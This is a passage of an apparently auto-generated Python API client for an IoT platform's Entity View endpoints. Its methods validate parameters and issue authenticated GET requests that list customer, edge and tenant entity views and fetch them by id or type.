return self.get_customer_entity_view_infos_using_get_with_http_info(customer_id, page_size, page, **kwargs) # noqa: E501
else:
(data) = self.get_customer_entity_view_infos_using_get_with_http_info(customer_id, page_size, page, **kwargs) # noqa: E501
return data
def get_customer_entity_view_infos_using_get_with_http_info(self, customer_id, page_size, page, **kwargs): # noqa: E501
"""Get Customer Entity View info (getCustomerEntityViewInfos) # noqa: E501
Returns a page of Entity View info objects assigned to customer. Entity Views limit the degree of exposure of the Device or Asset telemetry and attributes to the Customers. Every Entity View references exactly one entity (device or asset) and defines telemetry and attribute keys that will be visible to the assigned Customer. As a Tenant Administrator you are able to create multiple EVs per Device or Asset and assign them to different Customers. You can specify parameters to filter the results. The result is wrapped with PageData object that allows you to iterate over result set using pagination. See the 'Model' tab of the Response Class for more details. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customer_entity_view_infos_using_get_with_http_info(customer_id, page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str customer_id: A string value representing the customer id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:param int page_size: Maximum amount of entities in a one page (required)
:param int page: Sequence number of page starting from 0 (required)
:param str type: ## Entity View Filter Allows to filter entity views based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Concrete Mixer' entity views which name starts with 'CAT': ```json { \"type\": \"entityViewType\", \"entityViewType\": \"Concrete Mixer\", \"entityViewNameFilter\": \"CAT\" } ```
:param str text_search: The case insensitive 'startsWith' filter based on the entity view name.
:param str sort_property: Property of entity to sort by
:param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING)
:return: PageDataEntityViewInfo
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['customer_id', 'page_size', 'page', 'type', 'text_search', 'sort_property', 'sort_order'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_customer_entity_view_infos_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'customer_id' is set
if ('customer_id' not in params or
params['customer_id'] is None):
raise ValueError("Missing the required parameter `customer_id` when calling `get_customer_entity_view_infos_using_get`") # noqa: E501
# verify the required parameter 'page_size' is set
if ('page_size' not in params or
params['page_size'] is None):
raise ValueError("Missing the required parameter `page_size` when calling `get_customer_entity_view_infos_using_get`") # noqa: E501
# verify the required parameter 'page' is set
if ('page' not in params or
params['page'] is None):
raise ValueError("Missing the required parameter `page` when calling `get_customer_entity_view_infos_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'customer_id' in params:
path_params['customerId'] = params['customer_id'] # noqa: E501
query_params = []
if 'page_size' in params:
query_params.append(('pageSize', params['page_size'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'type' in params:
query_params.append(('type', params['type'])) # noqa: E501
if 'text_search' in params:
query_params.append(('textSearch', params['text_search'])) # noqa: E501
if 'sort_property' in params:
query_params.append(('sortProperty', params['sort_property'])) # noqa: E501
if 'sort_order' in params:
query_params.append(('sortOrder', params['sort_order'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/customer/{customerId}/entityViewInfos{?page,pageSize,sortOrder,sortProperty,textSearch,type}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageDataEntityViewInfo', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_customer_entity_views_using_get(self, customer_id, page_size, page, **kwargs): # noqa: E501
"""Get Customer Entity Views (getCustomerEntityViews) # noqa: E501
Returns a page of Entity View objects assigned to customer. You can specify parameters to filter the results. The result is wrapped with PageData object that allows you to iterate over result set using pagination. See the 'Model' tab of the Response Class for more details. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customer_entity_views_using_get(customer_id, page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str customer_id: A string value representing the customer id. For example, '784f394c-42b6-435a-<PASSWORD>-<PASSWORD>ff<PASSWORD>' (required)
:param int page_size: Maximum amount of entities in a one page (required)
:param int page: Sequence number of page starting from 0 (required)
:param str type: ## Entity View Filter Allows to filter entity views based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Concrete Mixer' entity views which name starts with 'CAT': ```json { \"type\": \"entityViewType\", \"entityViewType\": \"Concrete Mixer\", \"entityViewNameFilter\": \"CAT\" } ```
:param str text_search: The case insensitive 'startsWith' filter based on the entity view name.
:param str sort_property: Property of entity to sort by
:param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING)
:return: PageDataEntityView
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_customer_entity_views_using_get_with_http_info(customer_id, page_size, page, **kwargs) # noqa: E501
else:
(data) = self.get_customer_entity_views_using_get_with_http_info(customer_id, page_size, page, **kwargs) # noqa: E501
return data
def get_customer_entity_views_using_get_with_http_info(self, customer_id, page_size, page, **kwargs):  # noqa: E501
    """Get Customer Entity Views (getCustomerEntityViews)  # noqa: E501
    Returns a page of Entity View objects assigned to customer. You can specify parameters to filter the results. The result is wrapped with PageData object that allows you to iterate over result set using pagination. See the 'Model' tab of the Response Class for more details. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_customer_entity_views_using_get_with_http_info(customer_id, page_size, page, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str customer_id: A string value representing the customer id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
    :param int page_size: Maximum amount of entities in a one page (required)
    :param int page: Sequence number of page starting from 0 (required)
    :param str type: ## Entity View Filter Allows to filter entity views based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Concrete Mixer' entity views which name starts with 'CAT': ```json { \"type\": \"entityViewType\", \"entityViewType\": \"Concrete Mixer\", \"entityViewNameFilter\": \"CAT\" } ```
    :param str text_search: The case insensitive 'startsWith' filter based on the entity view name.
    :param str sort_property: Property of entity to sort by
    :param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING)
    :return: PageDataEntityView
    If the method is called asynchronously,
    returns the request thread.
    """
    # Keyword arguments accepted by this endpoint, plus the generic
    # per-request options shared by every generated API method.
    all_params = ['customer_id', 'page_size', 'page', 'type', 'text_search', 'sort_property', 'sort_order']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # NOTE: locals() snapshots everything bound so far (including 'self'
    # and 'all_params', which are never looked up below). Unknown keyword
    # arguments are rejected; known ones are merged into the snapshot.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_customer_entity_views_using_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'customer_id' is set
    if ('customer_id' not in params or
            params['customer_id'] is None):
        raise ValueError("Missing the required parameter `customer_id` when calling `get_customer_entity_views_using_get`")  # noqa: E501
    # verify the required parameter 'page_size' is set
    if ('page_size' not in params or
            params['page_size'] is None):
        raise ValueError("Missing the required parameter `page_size` when calling `get_customer_entity_views_using_get`")  # noqa: E501
    # verify the required parameter 'page' is set
    if ('page' not in params or
            params['page'] is None):
        raise ValueError("Missing the required parameter `page` when calling `get_customer_entity_views_using_get`")  # noqa: E501

    # No parameter of this endpoint uses a collection format (csv/multi).
    collection_formats = {}

    # Path parameters are substituted into the URL template below.
    path_params = {}
    if 'customer_id' in params:
        path_params['customerId'] = params['customer_id']  # noqa: E501

    # Optional query parameters are only sent when the caller supplied them.
    query_params = []
    if 'page_size' in params:
        query_params.append(('pageSize', params['page_size']))  # noqa: E501
    if 'page' in params:
        query_params.append(('page', params['page']))  # noqa: E501
    if 'type' in params:
        query_params.append(('type', params['type']))  # noqa: E501
    if 'text_search' in params:
        query_params.append(('textSearch', params['text_search']))  # noqa: E501
    if 'sort_property' in params:
        query_params.append(('sortProperty', params['sort_property']))  # noqa: E501
    if 'sort_order' in params:
        query_params.append(('sortOrder', params['sort_order']))  # noqa: E501

    header_params = {}

    # This GET endpoint sends no form fields, files, or request body.
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['X-Authorization']  # noqa: E501

    # Delegate the actual HTTP exchange (and async handling) to the client.
    return self.api_client.call_api(
        '/api/customer/{customerId}/entityViews{?page,pageSize,sortOrder,sortProperty,textSearch,type}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='PageDataEntityView',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_edge_entity_views_using_get(self, edge_id, page, page_size, **kwargs):  # noqa: E501
    """getEdgeEntityViews  # noqa: E501

    Fetch a page of entity views assigned to the given edge.
    This method is synchronous by default; pass ``async_req=True`` to get
    back the request thread instead of the result.
    >>> thread = api.get_edge_entity_views_using_get(edge_id, page, page_size, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str edge_id: edgeId (required)
    :param str page: page (required)
    :param str page_size: pageSize (required)
    :param str type: type
    :param str text_search: textSearch
    :param str sort_property: sortProperty
    :param str sort_order: sortOrder
    :param int start_time: startTime
    :param int end_time: endTime
    :return: PageDataEntityView
    If the method is called asynchronously,
    returns the request thread.
    """
    # Callers of this wrapper always receive just the deserialized payload.
    kwargs['_return_http_data_only'] = True
    # Sync and async invocations alike simply forward to the detailed
    # variant, which yields either the payload or the request thread.
    return self.get_edge_entity_views_using_get_with_http_info(edge_id, page, page_size, **kwargs)  # noqa: E501
def get_edge_entity_views_using_get_with_http_info(self, edge_id, page, page_size, **kwargs):  # noqa: E501
    """getEdgeEntityViews  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_edge_entity_views_using_get_with_http_info(edge_id, page, page_size, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str edge_id: edgeId (required)
    :param str page: page (required)
    :param str page_size: pageSize (required)
    :param str type: type
    :param str text_search: textSearch
    :param str sort_property: sortProperty
    :param str sort_order: sortOrder
    :param int start_time: startTime
    :param int end_time: endTime
    :return: PageDataEntityView
    If the method is called asynchronously,
    returns the request thread.
    """
    # Keyword arguments accepted by this endpoint, plus the generic
    # per-request options shared by every generated API method.
    all_params = ['edge_id', 'page', 'page_size', 'type', 'text_search', 'sort_property', 'sort_order', 'start_time', 'end_time']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # NOTE: locals() snapshots everything bound so far (including 'self'
    # and 'all_params', which are never looked up below). Unknown keyword
    # arguments are rejected; known ones are merged into the snapshot.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_edge_entity_views_using_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'edge_id' is set
    if ('edge_id' not in params or
            params['edge_id'] is None):
        raise ValueError("Missing the required parameter `edge_id` when calling `get_edge_entity_views_using_get`")  # noqa: E501
    # verify the required parameter 'page' is set
    if ('page' not in params or
            params['page'] is None):
        raise ValueError("Missing the required parameter `page` when calling `get_edge_entity_views_using_get`")  # noqa: E501
    # verify the required parameter 'page_size' is set
    if ('page_size' not in params or
            params['page_size'] is None):
        raise ValueError("Missing the required parameter `page_size` when calling `get_edge_entity_views_using_get`")  # noqa: E501

    # No parameter of this endpoint uses a collection format (csv/multi).
    collection_formats = {}

    # Path parameters are substituted into the URL template below.
    path_params = {}
    if 'edge_id' in params:
        path_params['edgeId'] = params['edge_id']  # noqa: E501

    # Optional query parameters are only sent when the caller supplied them.
    query_params = []
    if 'page' in params:
        query_params.append(('page', params['page']))  # noqa: E501
    if 'page_size' in params:
        query_params.append(('pageSize', params['page_size']))  # noqa: E501
    if 'type' in params:
        query_params.append(('type', params['type']))  # noqa: E501
    if 'text_search' in params:
        query_params.append(('textSearch', params['text_search']))  # noqa: E501
    if 'sort_property' in params:
        query_params.append(('sortProperty', params['sort_property']))  # noqa: E501
    if 'sort_order' in params:
        query_params.append(('sortOrder', params['sort_order']))  # noqa: E501
    if 'start_time' in params:
        query_params.append(('startTime', params['start_time']))  # noqa: E501
    if 'end_time' in params:
        query_params.append(('endTime', params['end_time']))  # noqa: E501

    header_params = {}

    # This GET endpoint sends no form fields, files, or request body.
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['X-Authorization']  # noqa: E501

    # Delegate the actual HTTP exchange (and async handling) to the client.
    return self.api_client.call_api(
        '/api/edge/{edgeId}/entityViews{?endTime,page,pageSize,sortOrder,sortProperty,startTime,textSearch,type}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='PageDataEntityView',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_entity_view_by_id_using_get(self, entity_view_id, **kwargs):  # noqa: E501
    """Get entity view (getEntityViewById)  # noqa: E501

    Fetch the EntityView object based on the provided entity view id. Entity Views limit the degree of exposure of the Device or Asset telemetry and attributes to the Customers. Every Entity View references exactly one entity (device or asset) and defines telemetry and attribute keys that will be visible to the assigned Customer. As a Tenant Administrator you are able to create multiple EVs per Device or Asset and assign them to different Customers. See the 'Model' tab for more details. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.
    >>> thread = api.get_entity_view_by_id_using_get(entity_view_id, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str entity_view_id: A string value representing the entity view id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
    :return: EntityView
    If the method is called asynchronously,
    returns the request thread.
    """
    # Callers of this wrapper always receive just the deserialized payload.
    kwargs['_return_http_data_only'] = True
    # Sync and async invocations alike simply forward to the detailed
    # variant, which yields either the payload or the request thread.
    return self.get_entity_view_by_id_using_get_with_http_info(entity_view_id, **kwargs)  # noqa: E501
def get_entity_view_by_id_using_get_with_http_info(self, entity_view_id, **kwargs):  # noqa: E501
    """Get entity view (getEntityViewById)  # noqa: E501
    Fetch the EntityView object based on the provided entity view id. Entity Views limit the degree of exposure of the Device or Asset telemetry and attributes to the Customers. Every Entity View references exactly one entity (device or asset) and defines telemetry and attribute keys that will be visible to the assigned Customer. As a Tenant Administrator you are able to create multiple EVs per Device or Asset and assign them to different Customers. See the 'Model' tab for more details. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_entity_view_by_id_using_get_with_http_info(entity_view_id, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str entity_view_id: A string value representing the entity view id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
    :return: EntityView
    If the method is called asynchronously,
    returns the request thread.
    """
    # Only the generic per-request options are accepted as kwargs here.
    all_params = ['entity_view_id']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # NOTE: locals() snapshots everything bound so far (including 'self'
    # and 'all_params', which are never looked up below). Unknown keyword
    # arguments are rejected; known ones are merged into the snapshot.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_entity_view_by_id_using_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'entity_view_id' is set
    if ('entity_view_id' not in params or
            params['entity_view_id'] is None):
        raise ValueError("Missing the required parameter `entity_view_id` when calling `get_entity_view_by_id_using_get`")  # noqa: E501

    # No parameter of this endpoint uses a collection format (csv/multi).
    collection_formats = {}

    # The entity view id is the only URL template substitution.
    path_params = {}
    if 'entity_view_id' in params:
        path_params['entityViewId'] = params['entity_view_id']  # noqa: E501

    # This endpoint takes no query string, form fields, files, or body.
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['X-Authorization']  # noqa: E501

    # Delegate the actual HTTP exchange (and async handling) to the client.
    return self.api_client.call_api(
        '/api/entityView/{entityViewId}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='EntityView',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_entity_view_info_by_id_using_get(self, entity_view_id, **kwargs):  # noqa: E501
    """Get Entity View info (getEntityViewInfoById)  # noqa: E501

    Fetch the Entity View info object based on the provided Entity View Id. Entity Views Info extends the Entity View with customer title and 'is public' flag. Entity Views limit the degree of exposure of the Device or Asset telemetry and attributes to the Customers. Every Entity View references exactly one entity (device or asset) and defines telemetry and attribute keys that will be visible to the assigned Customer. As a Tenant Administrator you are able to create multiple EVs per Device or Asset and assign them to different Customers. See the 'Model' tab for more details. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.
    >>> thread = api.get_entity_view_info_by_id_using_get(entity_view_id, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str entity_view_id: A string value representing the entity view id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
    :return: EntityViewInfo
    If the method is called asynchronously,
    returns the request thread.
    """
    # Callers of this wrapper always receive just the deserialized payload.
    kwargs['_return_http_data_only'] = True
    # Sync and async invocations alike simply forward to the detailed
    # variant, which yields either the payload or the request thread.
    return self.get_entity_view_info_by_id_using_get_with_http_info(entity_view_id, **kwargs)  # noqa: E501
def get_entity_view_info_by_id_using_get_with_http_info(self, entity_view_id, **kwargs):  # noqa: E501
    """Get Entity View info (getEntityViewInfoById)  # noqa: E501
    Fetch the Entity View info object based on the provided Entity View Id. Entity Views Info extends the Entity View with customer title and 'is public' flag. Entity Views limit the degree of exposure of the Device or Asset telemetry and attributes to the Customers. Every Entity View references exactly one entity (device or asset) and defines telemetry and attribute keys that will be visible to the assigned Customer. As a Tenant Administrator you are able to create multiple EVs per Device or Asset and assign them to different Customers. See the 'Model' tab for more details. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_entity_view_info_by_id_using_get_with_http_info(entity_view_id, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str entity_view_id: A string value representing the entity view id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
    :return: EntityViewInfo
    If the method is called asynchronously,
    returns the request thread.
    """
    # Only the generic per-request options are accepted as kwargs here.
    all_params = ['entity_view_id']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # NOTE: locals() snapshots everything bound so far (including 'self'
    # and 'all_params', which are never looked up below). Unknown keyword
    # arguments are rejected; known ones are merged into the snapshot.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_entity_view_info_by_id_using_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'entity_view_id' is set
    if ('entity_view_id' not in params or
            params['entity_view_id'] is None):
        raise ValueError("Missing the required parameter `entity_view_id` when calling `get_entity_view_info_by_id_using_get`")  # noqa: E501

    # No parameter of this endpoint uses a collection format (csv/multi).
    collection_formats = {}

    # The entity view id is the only URL template substitution.
    path_params = {}
    if 'entity_view_id' in params:
        path_params['entityViewId'] = params['entity_view_id']  # noqa: E501

    # This endpoint takes no query string, form fields, files, or body.
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['X-Authorization']  # noqa: E501

    # Delegate the actual HTTP exchange (and async handling) to the client.
    return self.api_client.call_api(
        '/api/entityView/info/{entityViewId}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='EntityViewInfo',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_entity_view_types_using_get(self, **kwargs):  # noqa: E501
    """Get Entity View Types (getEntityViewTypes)  # noqa: E501

    Returns a set of unique entity view types based on entity views that are either owned by the tenant or assigned to the customer which user is performing the request. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.
    >>> thread = api.get_entity_view_types_using_get(async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :return: list[EntitySubtype]
    If the method is called asynchronously,
    returns the request thread.
    """
    # Callers of this wrapper always receive just the deserialized payload.
    kwargs['_return_http_data_only'] = True
    # Sync and async invocations alike simply forward to the detailed
    # variant, which yields either the payload or the request thread.
    return self.get_entity_view_types_using_get_with_http_info(**kwargs)  # noqa: E501
def get_entity_view_types_using_get_with_http_info(self, **kwargs):  # noqa: E501
    """Get Entity View Types (getEntityViewTypes)  # noqa: E501
    Returns a set of unique entity view types based on entity views that are either owned by the tenant or assigned to the customer which user is performing the request. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_entity_view_types_using_get_with_http_info(async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :return: list[EntitySubtype]
    If the method is called asynchronously,
    returns the request thread.
    """
    # This endpoint has no parameters of its own; only the generic
    # per-request options are accepted as kwargs.
    all_params = []  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # NOTE: locals() snapshots everything bound so far (including 'self'
    # and 'all_params', which are never looked up below). Unknown keyword
    # arguments are rejected; known ones are merged into the snapshot.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_entity_view_types_using_get" % key
            )
        params[key] = val
    del params['kwargs']

    # No parameter of this endpoint uses a collection format (csv/multi).
    collection_formats = {}

    # Fixed URL: no path substitutions, query string, form data, or body.
    path_params = {}
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['X-Authorization']  # noqa: E501

    # Delegate the actual HTTP exchange (and async handling) to the client.
    return self.api_client.call_api(
        '/api/entityView/types', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[EntitySubtype]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_tenant_entity_view_infos_using_get(self, page_size, page, **kwargs):  # noqa: E501
    """Get Tenant Entity Views (getTenantEntityViews)  # noqa: E501

    Returns a page of entity views info owned by tenant. Entity Views limit the degree of exposure of the Device or Asset telemetry and attributes to the Customers. Every Entity View references exactly one entity (device or asset) and defines telemetry and attribute keys that will be visible to the assigned Customer. As a Tenant Administrator you are able to create multiple EVs per Device or Asset and assign them to different Customers. You can specify parameters to filter the results. The result is wrapped with PageData object that allows you to iterate over result set using pagination. See the 'Model' tab of the Response Class for more details. Available for users with 'TENANT_ADMIN' authority.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.
    >>> thread = api.get_tenant_entity_view_infos_using_get(page_size, page, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param int page_size: Maximum amount of entities in a one page (required)
    :param int page: Sequence number of page starting from 0 (required)
    :param str type: ## Entity View Filter Allows to filter entity views based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Concrete Mixer' entity views which name starts with 'CAT': ```json { \"type\": \"entityViewType\", \"entityViewType\": \"Concrete Mixer\", \"entityViewNameFilter\": \"CAT\" } ```
    :param str text_search: The case insensitive 'startsWith' filter based on the entity view name.
    :param str sort_property: Property of entity to sort by
    :param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING)
    :return: PageDataEntityViewInfo
    If the method is called asynchronously,
    returns the request thread.
    """
    # Callers of this wrapper always receive just the deserialized payload.
    kwargs['_return_http_data_only'] = True
    # Sync and async invocations alike simply forward to the detailed
    # variant, which yields either the payload or the request thread.
    return self.get_tenant_entity_view_infos_using_get_with_http_info(page_size, page, **kwargs)  # noqa: E501
def get_tenant_entity_view_infos_using_get_with_http_info(self, page_size, page, **kwargs):  # noqa: E501
    """Get Tenant Entity Views (getTenantEntityViews)  # noqa: E501
    Returns a page of entity views info owned by tenant. Entity Views limit the degree of exposure of the Device or Asset telemetry and attributes to the Customers. Every Entity View references exactly one entity (device or asset) and defines telemetry and attribute keys that will be visible to the assigned Customer. As a Tenant Administrator you are able to create multiple EVs per Device or Asset and assign them to different Customers. You can specify parameters to filter the results. The result is wrapped with PageData object that allows you to iterate over result set using pagination. See the 'Model' tab of the Response Class for more details. Available for users with 'TENANT_ADMIN' authority.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_tenant_entity_view_infos_using_get_with_http_info(page_size, page, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param int page_size: Maximum amount of entities in a one page (required)
    :param int page: Sequence number of page starting from 0 (required)
    :param str type: ## Entity View Filter Allows to filter entity views based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Concrete Mixer' entity views which name starts with 'CAT': ```json { \"type\": \"entityViewType\", \"entityViewType\": \"Concrete Mixer\", \"entityViewNameFilter\": \"CAT\" } ```
    :param str text_search: The case insensitive 'startsWith' filter based on the entity view name.
    :param str sort_property: Property of entity to sort by
    :param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING)
    :return: PageDataEntityViewInfo
    If the method is called asynchronously,
    returns the request thread.
    """
    # Keyword arguments accepted by this endpoint, plus the generic
    # per-request options shared by every generated API method.
    all_params = ['page_size', 'page', 'type', 'text_search', 'sort_property', 'sort_order']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # NOTE: locals() snapshots everything bound so far (including 'self'
    # and 'all_params', which are never looked up below). Unknown keyword
    # arguments are rejected; known ones are merged into the snapshot.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_tenant_entity_view_infos_using_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'page_size' is set
    if ('page_size' not in params or
            params['page_size'] is None):
        raise ValueError("Missing the required parameter `page_size` when calling `get_tenant_entity_view_infos_using_get`")  # noqa: E501
    # verify the required parameter 'page' is set
    if ('page' not in params or
            params['page'] is None):
        raise ValueError("Missing the required parameter `page` when calling `get_tenant_entity_view_infos_using_get`")  # noqa: E501

    # No parameter of this endpoint uses a collection format (csv/multi).
    collection_formats = {}

    # No path substitutions; everything travels in the query string.
    path_params = {}

    # Optional query parameters are only sent when the caller supplied them.
    query_params = []
    if 'page_size' in params:
        query_params.append(('pageSize', params['page_size']))  # noqa: E501
    if 'page' in params:
        query_params.append(('page', params['page']))  # noqa: E501
    if 'type' in params:
        query_params.append(('type', params['type']))  # noqa: E501
    if 'text_search' in params:
        query_params.append(('textSearch', params['text_search']))  # noqa: E501
    if 'sort_property' in params:
